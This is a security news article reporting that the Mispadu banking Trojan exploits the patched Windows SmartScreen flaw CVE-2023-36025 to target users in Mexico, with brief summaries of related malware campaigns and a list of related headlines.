Mispadu Banking Trojan Exploits Patched Windows SmartScreen Flaw
February 5, 2024
The Mispadu banking Trojan, first observed in 2019, has been updated to exploit a previously patched Windows SmartScreen security bypass flaw, targeting users in Mexico. This new variant, propagated via phishing emails, has been part of a larger family of Latin American banking malware. According to a report published by Palo Alto Networks Unit 42, Mispadu has already harvested 90,000 bank account credentials since August 2022.
The malware leverages CVE-2023-36025, a high-severity bypass flaw in Windows SmartScreen, which was addressed by Microsoft in November 2023. As security researchers Daniela Shalev and Josh Grunzweig explained, "This exploit revolves around the creation of a specifically crafted internet shortcut file (.URL) or a hyperlink pointing to malicious files that can bypass SmartScreen's warnings. The bypass is simple and relies on a parameter that references a network share, rather than a URL. The crafted .URL file contains a link to a threat actor's network share with a malicious binary."
Once launched, Mispadu selectively targets victims based on their geographic location and system configurations, and then establishes contact with a command-and-control (C2) server for data exfiltration. In recent months, the Windows flaw has been exploited by multiple cybercrime groups to deliver DarkGate and Phemedrone Stealer malware. Mexico has also been a prime target for several campaigns that propagate information stealers and remote access trojans like AllaKore RAT, AsyncRAT, Babylon RAT.
A financially-motivated group known as TA558 has been attacking the hospitality and travel sectors in the Latin American region since 2018. In addition, the Russian e-crime group known as FIN7 has been using DICELOADER, a custom downloader, delivered via malicious USB drives. The French cybersecurity firm Sekoia detailed the inner workings of DICELOADER and noted its sophisticated obfuscation methods to conceal the C2 IP addresses and the network communications.
Finally, AhnLab discovered two new malicious cryptocurrency mining campaigns that use booby-trapped archives and game hacks to deploy miner malware that mines Monero and Zephyr.
Related News
- Phemedrone Malware Campaign Exploits Windows SmartScreen Bypass Vulnerability
- Nim-Based Malware Delivered via Phishing Campaign Using Decoy Microsoft Word Documents
- BattleRoyal Hackers Employ Multiple Tactics to Deploy DarkGate RAT
- Public Release of PoC Exploit for Critical Windows Defender Bypass
- Windows Zero-Day CVE-2023-36025 Vulnerability: PoC Exploit Published by Researchers
Latest News
- Widespread Exploitation of Ivanti SSRF Zero-Day Vulnerability Observed
- Critical Vulnerability in Mastodon Social Network Allows Account Takeovers
- Russian APT28 Hackers Launch NTLM Relay Attacks on High-Value Global Targets
- CISA Instructs Federal Agencies to Disconnect Ivanti VPN Instances Amidst Zero-Day Exploits
- FritzFrog Botnet Targets Unpatched Internal Hosts via Log4Shell Exploitation
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.